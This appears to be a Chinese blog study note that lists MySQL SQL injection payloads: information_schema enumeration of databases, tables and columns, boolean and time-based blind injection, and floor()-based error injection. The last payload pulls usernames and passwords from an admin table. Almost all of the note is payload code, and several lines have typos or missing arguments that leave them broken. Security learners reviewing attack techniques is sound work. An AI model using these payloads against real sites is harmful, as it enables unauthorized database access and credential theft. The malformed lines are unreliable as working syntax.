zoukankan      html  css  js  c++  java
  • 注入复习总结

    注入复习笔记

     1 #常规注入:
     2 select schema_name from information_schema.schemata;
     3 select group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374;
     4 select group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374;
     5 #盲注:
     6 select and ascii(mid(databases(),1,1))=115;
     7 select and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1));
     8 select and ascii(substring((select columns_name from information_schema.columns where column_schena=database() limit 1,1),1,1));
     9 #延时盲注:
    10 select and if(ascii(substring(database(),1,)),sleep(10),1);
    11 select and if(ascii(substring((select table_name from information_schema.tables where table_schema=0x73716C696E6A656374),sleep(10),1));
    12 select and if(ascii(substring((select columns_name from information_schema.columns where column_schema=0x73716C696E6A656374)),1,1),sleep(10),1);
    13 #floor报错注入
    14 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
    15 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
    16 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
    17 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    注入复习总结

  • 相关阅读:
    Java 简单算法--打印乘法口诀(只使用一次循环)
    Java简单算法--求100以内素数
    ubuntu 16.04 chrome flash player 过期
    java 网络API访问 web 站点
    java scoket (UDP通信模型)简易聊天室
    leetcode1105 Filling Bookcase Shelves
    leetcode1140 Stone Game II
    leetcode1186 Maximum Subarray Sum with One Deletion
    leetcode31 Next Permutation
    leetcode834 Sum of Distances in Tree
  • 原文地址:https://www.cnblogs.com/nul1/p/8743319.html
Copyright © 2011-2022 走看看